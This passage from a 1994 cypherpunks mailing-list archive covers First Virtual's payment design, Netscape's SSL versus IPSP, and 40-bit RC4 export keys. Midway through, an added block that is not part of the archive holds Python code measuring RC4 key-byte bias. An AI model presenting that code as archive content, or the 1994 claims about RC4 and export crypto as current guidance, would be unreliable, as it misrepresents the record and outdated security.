Well, it doesn't use "any" crypto, hard or soft. As to "sluggish" -- I
would point out that you can set yourself up with an account in
minutes, without human intervention, which contrasts pretty well with
some of the experiences reported on this list with other systems. And
purchases are instantaneous. What's sluggish? Have you actually tried
using our system?

It is far from anonymous,

This depends on your definition of anonymity. In our system, a buyer
and a seller can meet and conduct business without EVER knowing each
other's identities unless they choose to reveal them. This is trivial,
and indeed it already happens all the time on our Infohaus. However,
First Virtual knows the real identities (or, at least, we know the real
underlying credit card, from which the real identity can be ultimately
traced), and can be forced to provide it to the government under court
order. We will otherwise keep all such information completely private.
I think this meets most practical standards for anonymity, and it is
certainly far more anonymous than most real-world commerce mechanisms
such as credit cards, where the buyer & seller names both appear on the
charge slip.

> and the transactions are trivially reversible. This is actually
> a _design goal_ in their "Soylent Green", er, "Simple Green" proposed standard.
I'm not sure what you're referring to here, but if you mean that it's
possible to refund someone's money, that's certainly true. All our
accounts are in principle bidirectional, although people can choose to
have buyer-only or seller-only accounts.

Just out of curiosity, if I think of a silly name to call someone
else's commerce mechanism, will that prove anything of interest?

> It is completely inappropriate for hard
> goods of significant value,

As we have made clear, this was an explicit design decision. Our terms
and conditions, which you don't seem to have read, actually FORBID the
use of our commerce engine for hard goods. So you really don't need to
work too hard to convince us on this point.

> and its minimum transaction cost
> is high enough to rule out its applicability for very small
> transactions.

Wrong again. We explicitly permit seller-based accumulation, so there's
nothing to stop you from building a service that charges, say, a tenth
of a penny for each bit of information; however, you have to accumulate
the charges on your end until they pass our 30 cent threshold, that's
all. If someone buys less than 30 cents worth of stuff from you, you
have to take it as a "free sample" loss.

> Even if used for purely informational goods,
> if an undercapitalized info service becomes popular, it will
> sink beneath the waves while waiting for payment.

This is amazingly wrong. First of all, consider what it means for an
info service to become popular: It means that their server and net
connection are more highly utilized. Neither of these is typically a
metered resource, which means the incremental costs are zero. There's
an incremental cost involved in upgrading either of them, but if your
service is so wildly successful that you have this problem, how hard do
you think it will be for you to get a bank loan to cover an upgrade to
your computing facilities or Internet connection, which are the ONLY
incremental costs of this kind of runaway success?
It is also worth noting that in the existing credit card system, new
merchants who have only recently qualified for Visa/MC merchant status
often have a similar holding period imposed upon them by their banks.
It's Standard Operating Procedure, that's all. If you're setting up an
information service based on our mechanism, the cost of operation for
the first 90 days should be factored into your startup expenses, just
the way you would have to factor in the cost of inventory for a
hard-goods business. (Indeed, for most hard goods businesses, the
inventory cost would be higher than 90 days operating expenses.)

> As near as I can tell, FV's technology was developed by people
> who wanted to implement their pet philosophy about Internet
> commerce (customer should examine info first, then commit to
> paying, all transactions reversible, cryptography and anonymity
> are bad, secure transactions are not possible on the net, etc.),
> rather than anything bordering on an Internet cash-like system.

Wrong again. FV's technology was developed by people who wanted to sell
information products on the Internet. That's the ONLY reason we did it.
We didn't (and still don't) see any other commerce mechanism that would
meet our needs, so we built one. We expect to make our money on
information products, not on the commerce engine.

We also don't think cryptography and anonymity are bad. If you would
just read our materials, you will see that we think that cryptography
is problematic and that anonymity is good. We've strived for the
maximum possible anonymity without the problems we perceive in using
cryptography. (And FYI, we know whereof we speak: we use cryptography
heavily internally, and we are extremely aware both of its power and
utility AND of the practical difficulties in its use.)

> So, I ask, First Virtual is looking better and better for doing
> _what_? Until they deal with the interface problem (get a decent
> client, rather than relying exclusively on e-mail), I think
> they're not even going to be adequate for getting shareware-scale
> proceeds from putting up a cool Web page.

Please check out our Web pages before you make any more comments like
this one. You can buy stuff today from our Infohaus, using Web or FTP
access, or email if you prefer, so it's pretty silly to say that we
rely exclusively on email. (Actually, the email interface is the LEAST
usable.) The people selling things on our Infohaus -- who are NOT
associated with FV in any way other than as our customers -- get paid
in REAL MONEY. Tell *them* that the system isn't adequate. Or tell it
to my in-laws, who are now getting monthly loan repayments (real money)
from me via a cron job that I set up on my own machine at home (Setting
up such a job requires no special FV intervention -- anyone who knows
how to set up a cron job can do it, it's that easy. This stuff really
works, check it out!)

> FV may be more operational, although I'm curious if any transactions have managed to fully settle yet...

We haven't been up for 90 days yet, so no funds have passed the aging
period. I'll suggest to our PR people that they make a big deal about
the first settlement to sellers, which should happen in January...

> The two systems are worlds apart in terms of where the risk is placed.
> FV places the risk entirely on the vendor; DigiCash places the risk
> entirely on the e-cash holder. Note that lots of people walk around with
> credit cards, bills _and_ coins in their wallets, and use them for different
> things throughout the day. I don't think that things are going to be
> that different on the net.

Hey, we agree on something! Different mechanisms for different purposes
makes perfect sense.
This is why you won't, in general, find us bad-mouthing any of the
other systems -- we think there's room for several payment mechanisms
on the net, and don't see any purpose being served by "taking the low
road". I'm happy to note that the folks behind the other systems seem
to be taking a similar approach. I hope we can all keep it up.

> I think that if people want try before you buy, it can be done
> (easily) without building it into the payment protocol. I'm
> all for shareware, giving freebies so folks get hooked, and
> so forth, but it seems odd to build a unconditional rejection into
> the payment system, especially for products that can't be
> returned in any meaningful sense.

Of course it can be done without bundling it into the payment protocol.
You've missed a critical point: By "bundling" it into the payment
protocol, we have been able to achieve a vast SIMPLIFICATION of the
payment protocol. It is not a coincidence that we are the first (and so
far, still the only) system that is operational with real money. It's
because we set out to implement that subset of commerce that was
amenable to rapid deployment. Try-before-you-buy permits a vastly
simplified commerce system, but nobody should be surprised if that
commerce system is ONLY useful in situations where try-before-you-buy
is acceptable!

> don't get me wrong here! I _have_ read the web pages, and I
> note that you still have to pop into your e-mail to approve the
> purchase. This is an inherent flaw to the protocol, that there
> will be 2-3 user-side software components, instead of 1-2 with
> DigiCash:

You've read them, but you don't appear to have understood them, which
is probably our fault, not yours. The email confirmation is indeed a
bit cumbersome if it gets invoked very often and your mail system isn't
FV-smartened.
But if you use an FV-smart mail tool -- and note that Z-code recently
became the first vendor to publicly announce and demonstrate support
for our protocols -- you can get this down to where a single mouse
click authorizes a dozen or so purchases. Not a big deal. You could
even have an intelligent agent do the authorization for you in some
cases, although this requires some real caution!

> I'm assuming that over time, the TCP/IP payment methods will be
> integrated into browsing software, but FV will always be hampered
> by the need to have something separate to handle the back-channel,
> since they are religiously opposed to using signatures for
> validation (although you suggest some progress in this area).

You can already browse by Web or FTP, so "over time" == "now". Once
again, we're not OPPOSED (religiously or otherwise) to using digital
signatures, we're just opposed to making electronic commerce wait for
the widespread deployment of signature technologies. When such
technologies are widely deployed, we'll probably use them (though this
is not a promise, it will depend on the situation at the time).

Sorry for the length of this message -- I hope it clears up a few
misconceptions. -- Nathaniel

PS -- Doug, please tell the folks at Tadpole that your mailer is not
doing a very good job generating Message-ID headers. In particular, it
isn't getting the domain right in the Message-ID, which can be a
problem for Message-ID uniqueness. Specifically, instead of

    <9412021548.AA17294 at tadpole>

it should really be

    <9412021548.AA17294 at tadpole.com>

It's just a nit, but these little details do matter, and if you tell me
what mail tool you're using, I might be able to tell you how to fix it.
-- NB

From kipp at warp.mcom.com  Tue Dec 13 10:36:36 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Tue, 13 Dec 94 10:36:36 PST
Subject: the netscape/ssl controversy
Message-ID: <9412131834.AA18515@warp.mcom.com>

In article <199412131448.JAA07613 at cutter.clas.ufl.edu>, you write:
> have to get my two cents in:
>
> netscape has a proposal that secures the *transport* of files. pgp and
> the like secure the actual files themselves. the question that will
> have to be answered is "which method of security is more valuable to
> the internet as a whole?"
>
> of course i have made up my mind, but i'll waste some space and share
> those thoughts here.
>
> ...much elided...
>
> so while ssl may well be a wonderful protocol, it does not address the
> problems that many cypherpunks see as being real. i think it would do
> netscape good to listen to and consider the views of many on this
> list, as they have many genuinely good ideas, even if they choose a
> confrontational manner.

My personal opinion is that using MIME encoded documents with embedded
security information including digital signatures combined with SSL or
other transport layer security, will be a reasonable solution.

Please check out:

ftp://ds.internic.net/internet-drafts/draft-ietf-pem-sigenc-02.txt

and

ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-07.txt

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com          http://www.mcom.com/people/kipp/index.html

From eric at remailer.net  Tue Dec 13 10:43:14 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 13 Dec 94 10:43:14 PST
Subject: IPSP and Netscape
In-Reply-To: <9412131807.AA18482@warp.mcom.com>
Message-ID: <199412131940.LAA02454@largo.remailer.net>

   From: kipp at warp.mcom.com (Kipp E.B. Hickman)

   IPSP was not in my vocabulary at the time of the first posting.
   Ignorance was briefly bliss :^)

This indeed was exactly the problem.
Might I suggest that some amount of acknowledgement of the outside
world and a survey of existing work would solve most of Netscape's PR
problems on this list?

Eric

From perry at imsi.com  Tue Dec 13 10:45:35 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 10:45:35 PST
Subject: BofA + Netscape
In-Reply-To: <199412131814.KAA07205@jobe.shell.portal.com>
Message-ID: <9412131845.AA12626@snark.imsi.com>

anonymous-remailer at shell.portal.com says:
> Does anybody remember PGP 1.0? Released in the summer of 1991, using
> the Bass-O-Matic cipher... which was worthless.
>
> This list didn't come into existence until around the same time PGP
> 2.0 came out. Thus, nobody railed against the weaknesses of PGP like
> they are railing against NetScape.

Imagine if someone proposed Bass-O-Matic today, however. Well, we have
better technologies than SSL today -- IMPLEMENTED AND AVAILABLE -- so
they aren't pioneering -- they are going retrograde.

Perry

From kipp at warp.mcom.com  Tue Dec 13 10:47:45 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Tue, 13 Dec 94 10:47:45 PST
Subject: More 40-bit RC4 nonsense
Message-ID: <9412131845.AA18544@warp.mcom.com>

In article <199412131742.JAA27330 at netcom5.netcom.com>, you write:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> If I recall correctly, the first byte out of the RC4 stream has
> about a 40% chance of being the first byte of the key. Thus, if the
> 40-bit "secret" part of the key is the _beginning_ of the full 128-bit
> key, then the keyspace is effectively reduced by about seven bits,
> meaning that I would be able to crack a key on my PC in a couple of
> days or so.
> Of course, if the "clear" 88 bits went first, there would be no
> advantage whatsoever. The SSL document very carefully does not say
> how they combine the two key parts to form the 128-bit key. Does
> anyone know?
>
> Raph
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6
>
> iQCVAwUBLu3cI/4BfQiT0bDNAQEToQQAtcy2v0sBd+g5GBrm+Pa1AykqS4tTctfu
> EYga7kPry4wvGmI7/HpD+SVVDQRcJe+O9CxH9cpvRgBRIBhyvsFXVBSTW0OTJgXb
> 1bYh5qerD5J/gXAs0XWIp0+Hj8GqeTIRkFTseU4MDcDfQ7tOSEFvul97iSNYIytX
> AMkmAEmMXxU=
> =S80T
> -----END PGP SIGNATURE-----

OOPS. This is a spec omission. The clear key data (aka "salt") is
combined with the secret portion as follows:

The bytes of the salt are concatenated with the secret portion with
the secret portion making up the least significant bytes of the
concatenation.

I will spec'ize the English...

By the way, where did this 40% number come from? For some reason RSA
never told me this... :^(

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com          http://www.mcom.com/people/kipp/index.html

From rsalz at osf.org  Tue Dec 13 10:48:46 1994
From: rsalz at osf.org (Rich Salz)
Date: Tue, 13 Dec 94 10:48:46 PST
Subject: Clarification of my remarks about Netscape
Message-ID: <9412131844.AA13693@sulphur.osf.org>

> Please define a solution that is:
> distributed
> reliable
> supports an unforgeable name to public-key mapping
> standard
> not-bulky
> not-expensive

Build a new API out of sockets and GSSAPI?

    ssl_t s = ssl_bind(char *hostname, int port, char *servername);
    ssl_status_t ssl_secure(ssl_t s, oid_t security_type, unsigned32 flags);

etc...
	/r$

From jcorgan at netcom.com  Tue Dec 13 10:48:47 1994
From: jcorgan at netcom.com (Johnathan Corgan)
Date: Tue, 13 Dec 94 10:48:47 PST
Subject: BofA+Netscape
Message-ID:

> Is that the same Microsoft that brought us Edlin???

Wasn't edlin based on the Unix ed?
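
Added example (not part of the original messages, and not Netscape's or
RSA's code): a plain RC4 implementation keyed the way Kipp Hickman's reply
above describes, 88 clear salt bits followed by the 40 secret bits, which
measures on constructed random keys how often the first state byte after key
setup, and the first keystream byte, equal the first key byte. Reading
"least significant bytes" as the trailing bytes of the 16-byte key is an
assumption, as are all function names.

```python
"""RC4 keyed with an export-style key: 88 clear "salt" bits + 40 secret bits.

Added illustration. The function names and the byte order of the
concatenation (salt bytes first, secret bytes last) are assumptions.
"""
import random

SALT_LEN = 11    # 88 bits sent in the clear
SECRET_LEN = 5   # 40 bits kept secret


def export_key(salt: bytes, secret: bytes) -> bytes:
    """Build the 128-bit RC4 key: salt bytes, then the secret bytes."""
    if len(salt) != SALT_LEN or len(secret) != SECRET_LEN:
        raise ValueError("expected an 11-byte salt and a 5-byte secret")
    return salt + secret


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: return the 256-entry state after key setup."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 keys are 1 to 256 bytes long")
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) & 0xFF
        state[i], state[j] = state[j], state[i]
    return state


def rc4_prga(state: list, n: int) -> bytes:
    """Produce n keystream bytes, working on a copy of the given state."""
    s = list(state)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (the same operation) data under key."""
    keystream = rc4_prga(rc4_ksa(key), len(data))
    return bytes(d ^ k for d, k in zip(data, keystream))


def measure(trials: int = 5000, seed: int = 1994) -> dict:
    """Return two observed frequencies over constructed random keys.

    state0_eq_key0:  state[0] after key setup equals key[0]. The very first
        key-setup swap writes the value key[0] into state[0]; the match
        survives only if no later swap touches index 0.
    stream0_eq_key0: the first keystream byte equals key[0].

    Under the assumed layout key[0] is a salt byte, i.e. clear material.
    """
    rng = random.Random(seed)  # fixed seed: repeatable test data, not key-grade
    state_hits = stream_hits = 0
    for _ in range(trials):
        salt = bytes(rng.randrange(256) for _ in range(SALT_LEN))
        secret = bytes(rng.randrange(256) for _ in range(SECRET_LEN))
        key = export_key(salt, secret)
        state = rc4_ksa(key)
        if state[0] == key[0]:
            state_hits += 1
        if rc4_prga(state, 1)[0] == key[0]:
            stream_hits += 1
    return {
        "state0_eq_key0": state_hits / trials,
        "stream0_eq_key0": stream_hits / trials,
    }


if __name__ == "__main__":
    for name, rate in measure().items():
        print(f"{name}: {rate:.4f}")
```
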
From rsalz at osf.org  Tue Dec 13 10:50:12 1994
From: rsalz at osf.org (Rich Salz)
Date: Tue, 13 Dec 94 10:50:12 PST
Subject: News->Mail & CMU's Andrew Message System
Message-ID: <9412131824.AA13662@sulphur.osf.org>

> AMS is pretty strongly tied to AFS (now known as part of DCE)

At some levels DCE's distributed file system (DFS) is "AFS version 5"
(sic), but not really. The original intent was that DFS was AFS with
the IPC replaced with secure DCE RPC, but there's a whole mess of
protocol changes since then. They're different beasts.
	/r$

From perry at imsi.com  Tue Dec 13 10:50:13 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 10:50:13 PST
Subject: IPSP and Netscape
In-Reply-To: <9412131807.AA18482@warp.mcom.com>
Message-ID: <9412131849.AA12640@snark.imsi.com>

Kipp E.B. Hickman says:
> I'm sorry you are so upset. :-(
>
> IPSP was not in my vocabulary at the time of the first posting. Ignorance
> was briefly bliss :^)

My complaint about Netscape is that you guys haven't been reading
about what others have done. I understand your desire to get things
done quickly, but you are making assumptions about what's out there and
what works that aren't warranted.

> However, regardless of whether or not extant hardware is reusable,
> there is still the not so small matter of software. Software for PC's,
> MAC's and a host of UNIX machines before a workable secure network can
> be constructed.

Certainly. SSL would also require software for all those platforms --
it's no different in this regard.

> Finally, I never said that "SSL is better than anything out there". I
> don't know who did. All I said is that "SSL is something", which isn't
> really saying much. SSL is A solution to A set of problems, namely
> privacy and authentication.

Privacy and authentication are also provided by IPSP.
However, IPSP provides all sorts of advantages -- immunity from traffic
analysis, no requirement to change the way an application operates to
start using it, protection of the entire IP stack (not just TCP
sockets), very minimal changes required to applications that want to
use the information provided by the IPSP layer for authentication (and
no need to change your read or write calls or anything), etc, etc, etc.

Perry

From perry at imsi.com  Tue Dec 13 10:51:19 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 10:51:19 PST
Subject: What, exactly is elliptic encryption?
In-Reply-To: <199412131842.KAA02350@largo.remailer.net>
Message-ID: <9412131850.AA12653@snark.imsi.com>

Eric Hughes says:
> From: "Perry E. Metzger"
> Basically, there are ways of extending public key methods into fields
> other than the integers modulo some prime
>
> Small correction. While integer modulo a prime are fields (i.e. they
> have division), elliptic curve solutions only have a group structure,
> which is usually written as addition.

I stand corrected...

.pm

From adam at bwh.harvard.edu  Tue Dec 13 10:52:50 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Tue, 13 Dec 94 10:52:50 PST
Subject: Authentication vs encryption: CPs on the web
In-Reply-To: <199412131744.JAA04700@jobe.shell.portal.com>
Message-ID: <199412131851.NAA22099@bwnmr5.bwh.harvard.edu>

With all due respect, I disagree with your assessment. Anonymity is a
job, and we should build small tools to do jobs. It is my feeling that
building anonymity into the web will make the protocols more complex
than they need to be.

There is no anonymity in mail, but we have anonymous mail of varying
privacy. I suspect mixmaster will greatly enhance that. To get privacy
in the web, build a web remailer on top of the CERN or TIS HTTPd
proxies. Encrypt between you & the proxy, let the proxy go out.

Adam

| This is IMO the standard cypherpunks wish list as applied to the WWW.
| But it does not seem to match up with either the commercial or
| institutional interests which are driving the standards process. I
| hope those CP's who are involved in these efforts can work to spotlight
| the need for individual privacy. We should give as much power, choice,
| and control as possible to the individual end-users of the web.
| Otherwise privacy is going to be very difficult to maintain in this
| world of electronic commerce.
|
| Hal Finney
| hfinney at shell.portal.com

--
"It is seldom that liberty of any kind is lost all at once."
					       -Hume

From jamesd at netcom.com  Tue Dec 13 10:54:24 1994
From: jamesd at netcom.com (James A. Donald)
Date: Tue, 13 Dec 94 10:54:24 PST
Subject: James Donald's comments
In-Reply-To: <9412131431.AA07769@webster.imsi.com>
Message-ID: <199412131852.KAA23951@netcom10.netcom.com>

Perry E. Metzger writes
>
> James Donald has claimed that I've been talking about vaporware and
> that Netscape has produced "real cool crypto for the masses".

I am sorry if I seemed to be saying that: I well know that that is not
true.

But right now today everyone on the net who sends out a form through
Netscape's 0.96 web browser gets a warning that his form is not
encrypted, with the implication that it should be. (Unless he turns
off the warning.)

Thus millions of people are being exposed to cryptography.

What I meant to say is that Netscape is bringing Crypto to the *masses*
and you are not. I did not intend to say that Netscape is bringing
Crypto and you are not.

--
 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From perry at imsi.com  Tue Dec 13 10:57:43 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 10:57:43 PST
Subject: BofA+Netscape
In-Reply-To:
Message-ID: <9412131857.AA12682@snark.imsi.com>

Johnathan Corgan says:
> > Is that the same Microsoft that brought us Edlin???
>
> Wasn't edlin based on the Unix ed?

No.

.pm

From kipp at warp.mcom.com  Tue Dec 13 10:59:28 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Tue, 13 Dec 94 10:59:28 PST
Subject: IPSP and Netscape
In-Reply-To: <9412131849.AA12640@snark.imsi.com>
Message-ID: <9412131057.ZM18561@warp.mcom.com>

On Dec 13, 1:49pm, Perry E. Metzger wrote:
> Subject: Re: IPSP and Netscape
>
> Kipp E.B. Hickman says:
> > I'm sorry you are so upset. :-(
> >
> > IPSP was not in my vocabulary at the time of the first posting. Ignorance
> > was briefly bliss :^)
>
> My complaint about Netscape is that you guys haven't been reading
> about what others have done. I understand your desire to get things
> done quickly, but you are making assumptions about what's out there and
> what works that aren't warranted.

I think you may have jumped to a conclusion here that is unwarranted.
We are a small company with limited experience and capacity. We did
what we thought was appropriate, however it may seem now.

> > However, regardless of whether or not extant hardware is reusable,
> > there is still the not so small matter of software. Software for PC's,
> > MAC's and a host of UNIX machines before a workable secure network can
> > be constructed.
>
> Certainly. SSL would also require software for all those platforms --
> it's no different in this regard.

True. However, we have found a way to get it to the masses quickly.
System software is inherently more difficult to distribute, and
consequently takes more time. When I was doing operating system work at
SGI, it was often a year before the customer base would see the fruits
of my labor. However, with Netscape, things are faster and it is easier
to get people to load an "application" than it is to load a new
winsock/kernel.
The delivery vehicle is very important to the marketplace.

In my mind, SSL and IPSP are two solutions with very similar
properties. However, SSL can be implemented at the application layer.
I'm not certain if IPSP can, and I'm also not certain that if it
could, people would be as happy with it.

A (probably naive) question: If IPSP is essentially "tunnelling",
don't sysadmin's and the like get concerned that now their fancy
routers etc. can no longer shield certain classes of unwanted traffic?

> > Finally, I never said that "SSL is better than anything out there". I
> > don't know who did. All I said is that "SSL is something", which isn't
> > really saying much. SSL is A solution to A set of problems, namely
> > privacy and authentication.
>
> Privacy and authentication are also provided by IPSP. However, IPSP
> provides all sorts of advantages -- immunity from traffic analysis, no
> requirement to change the way an application operates to start using
> it, protection of the entire IP stack (not just TCP sockets), very
> minimal changes required to applications that want to use the
> information provided by the IPSP layer for authentication (and no need
> to change your read or write calls or anything), etc, etc, etc.

These are all good properties. As with any technology, it takes time
to deploy. When these capabilities are the norm instead of the rarity,
SSL will no longer be needed, except as a compatibility crutch.

--
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com          http://www.mcom.com/people/kipp/index.html

From adam at bwh.harvard.edu Tue Dec 13 11:00:37 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Tue, 13 Dec 94 11:00:37 PST
Subject: IPSP and Netscape
In-Reply-To: <9412131807.AA18482@warp.mcom.com>
Message-ID: <199412131900.OAA22550@bwnmr5.bwh.harvard.edu>

Kipp wrote:

| IPSP was not in my vocabulary at the time of the first posting.
Ignorance
| was briefly bliss :^)

My, this is a _tasty_ burger.

| However, regardless of whether or not extant hardware is reusable,
| there is still the not so small matter of software. Software for PC's,
| MAC's and a host of UNIX machines before a workable secure network can
| be constructed. It is a good thing that IPSP requires only software to
| meet its goals. This same property is true of SSL.
|
| Finally, I never said that "SSL is better than anything out there". I
| don't know who did. All I said is that "SSL is something", which isn't
| really saying much. SSL is A solution to A set of problems, namely
| privacy and authentication.

I'm not sure I understand. Could you explain what you mean by
privacy, and how it is maintained by SSL? (My question, obviously, is
informed by Hal's recent comments on privacy.)

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From klbarrus at owlnet.rice.edu Tue Dec 13 11:04:12 1994
From: klbarrus at owlnet.rice.edu (Karl Lui Barrus)
Date: Tue, 13 Dec 94 11:04:12 PST
Subject: What, exactly is elliptic encryption?
In-Reply-To: <199412130621.AAA07346@pentagon.io.com>
Message-ID: <9412131903.AA13409@snowy.owlnet.rice.edu>

dfloyd at io.com wrote:

>What, exactly is elliptic curve encryption?

Well, some others have already described it. I'll list some references
I've found:

A Course in Number Theory and Cryptography, 2nd edition, Neal Koblitz,
Springer-Verlag.

Chapter 6 is titled "Elliptic Curves" and is split into four parts:
basics, cryptosystems, factorization, primality testing.

Elliptic Curve Public Key Cryptosystems, Alfred Menezes, Kluwer
Academic Publishers.

Haven't had a chance to read this book yet. Looks pretty good though :)

Algorithms for Modular Elliptic Curves, J. E. Cremona, Cambridge
University Press.

Found this book last week, along with the above mentioned Menezes
book. Likewise, I haven't had a chance to read it yet.
It is divided into three parts: description of constructing elliptic
curves, a collection of algorithms, a huge list of tables. The
algorithms are either in Fortran or in pseudocode (unless the Fortran
used allows semicolons and the sh-like FI keyword).

>(Only thing I knew that the NeXT nearly had it in its OS, but
>the heavy hammer of ITAR squashed that...)

Yeah, for a while a friend and I tried getting that to work, but we
were never successful. Then, in a version upgrade, the encryption
disappeared ;)

--
Karl L. Barrus: klbarrus at owlnet.rice.edu
2.3: 5AD633; D1 59 9D 48 72 E9 19 D5 3D F3 93 7E 81 B5 CC 32
2.6: 088C8F21; 97 73 9E 8B 98 3E DD B5 E8 97 64 7E 20 95 60 D9
"One man's mnemonic is another man's cryptography" - K. Cooper

From kipp at warp.mcom.com Tue Dec 13 11:05:44 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Tue, 13 Dec 94 11:05:44 PST
Subject: IPSP and Netscape
In-Reply-To: <199412131900.OAA22550@bwnmr5.bwh.harvard.edu>
Message-ID: <9412131103.ZM18575@warp.mcom.com>

On Dec 13, 2:00pm, Adam Shostack wrote:
> Subject: Re: IPSP and Netscape
> Kipp wrote:
>
> | IPSP was not in my vocabulary at the time of the first posting. Ignorance
> | was briefly bliss :^)
>
> My, this is a _tasty_ burger.
>
> | However, regardless of whether or not extant hardware is reusable,
> | there is still the not so small matter of software. Software for PC's,
> | MAC's and a host of UNIX machines before a workable secure network can
> | be constructed. It is a good thing that IPSP requires only software to
> | meet its goals. This same property is true of SSL.
> |
> | Finally, I never said that "SSL is better than anything out there". I
> | don't know who did. All I said is that "SSL is something", which isn't
> | really saying much. SSL is A solution to A set of problems, namely
> | privacy and authentication.
>
> I'm not sure I understand. Could you explain what you mean by
> privacy, and how it is maintained by SSL?
(My question, obviously, is
> informed by Hal's recent comments on privacy.)

SSL provides "channel" privacy. The two endpoints which are
communicating can be ensured of three basic properties:

    1. You are certain who you are talking to (server authentication)
    2. Your conversation with the server is private (privacy using
       encryption)
    3. Your conversation cannot be interfered with (data integrity)

That is all SSL does. MIME multipart encoding used on documents can
provide deeper encryption, tamper-proof document storage, etc. There
are up and coming standards for these actions.

--
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com          http://www.mcom.com/people/kipp/index.html

From jamesd at netcom.com Tue Dec 13 11:06:07 1994
From: jamesd at netcom.com (James A. Donald)
Date: Tue, 13 Dec 94 11:06:07 PST
Subject: the netscape/ssl controversy
In-Reply-To: <199412131448.JAA07613@cutter.clas.ufl.edu>
Message-ID: <199412131904.LAA25368@netcom10.netcom.com>

Avi Harris Baumstein writes
> netscape has a proposal that secures the *transport* of files. pgp and
> the like secure the actual files themselves. the question that will
> have to be answered is "which method of security is more valuable to
> the internet as a whole?"

No. Both methods are valuable.

Netscape has provided a screwdriver. People are screaming at
them for not producing a hammer. They are planning the hammer
later.

We do not have to choose. The more tools, the better.

The correct response is "Thanks, but what we really want is a
hammer."

Not "You stupid assholes, if you had the brains of a turnip you
would know that a screwdriver is THE WRONG TOOL AND THE RIGHT
TOOL IS A HAMMER, YOU HALF WITTED MORONS."

--
 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.
True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From anonymous-remailer at shell.portal.com Tue Dec 13 11:09:03 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 13 Dec 94 11:09:03 PST
Subject: unix and windows
Message-ID: <199412131908.LAA12642@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

> As to the general issue of MSWindows v. Unix, the Unix predominance
> for remailer software involves the fact that Unix is on the bulk of
> the machines connected to the Internet. It's more reliable for
> offering network services than MSWindows and it's got a cleaner
> architecture for reconfiguration. None of these explanations,
> however, means that there won't be more MSWindows than Unix boxes for
> a long time.

True. But I think the "balance of power" (actually, balance of
numbers) will shift in the future.

I make an analogy with manual transmission.

For years, if you wanted to drive, manual transmission was the only
choice. When automatic transmissions appeared, people scoffed. Now,
automatic transmissions dominate, and 20% of the driving population
prefers manual transmission.

For years, if you wanted internet connectivity, Unix was the only
choice. When Warp, Windows NT, and Windows 95 (to be released ;)
appeared, people scoffed. In the future, 20% of the internet
connected will still prefer Unix for some reason.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLu3w8sSF/V8IjI8hAQFdcwQAm00BIeO9ySbZSQAY8QMkF/TlSaR+FsL0
1Ekm27s5G/WzXrOaekMvy0WGGmYJ2/aoFBj2GSSgonxqB8PKTxZtSuSSWeMPszVa
evpwrNi3IfcV1lpyBCPVYRmLO3x4zigMjOpG25Ji2DNfVp/Mrda9lNUYo9dodkiT
o4rO3dtlZss=
=+DOl
-----END PGP SIGNATURE-----

From perry at imsi.com Tue Dec 13 11:11:12 1994
From: perry at imsi.com (Perry E.
Metzger)
Date: Tue, 13 Dec 94 11:11:12 PST
Subject: IPSP and Netscape
In-Reply-To: <9412131057.ZM18561@warp.mcom.com>
Message-ID: <9412131910.AA12716@snark.imsi.com>

"Kipp E.B. Hickman" says:
> A (probably naive) question: If IPSP is essentially "tunnelling",
> don't sysadmin's and the like get concerned that now their fancy
> routers etc. can no longer shield certain classes of unwanted
> traffic?

You are right that an encrypted IPSP packet can't be "peeked into" and
thus can't be selectively blocked by a filtering router. There is,
however, a notion in the IPv6 version (will be in the v4 version if I
have anything to do with it) of a "transparent authentication header"
which allows you to achieve authentication without privacy for those
situations that require the ability to filter packets at a firewall.

Overall, however, IPSP reduces (but does NOT by any means eliminate)
the need for firewalls, because IPSP packets can be fully private and
authenticated and thus can't be hijacked.

Perry

From jamesd at netcom.com Tue Dec 13 11:14:56 1994
From: jamesd at netcom.com (James A. Donald)
Date: Tue, 13 Dec 94 11:14:56 PST
Subject: BofA+Netscape
In-Reply-To: <9412131442.AA12105@snark.imsi.com>
Message-ID: <199412131914.LAA26551@netcom10.netcom.com>

> Marc Andreessen says:
> > Great, IPSP looks fantastic and we look forward to supporting it
> > as it moves through and beyond the "near" phase.

Perry E. Metzger writes
> Given that you haven't read any IPSP documents, I can only interpret
> your comments as sarcasm. If they aren't sarcasm, they represent more
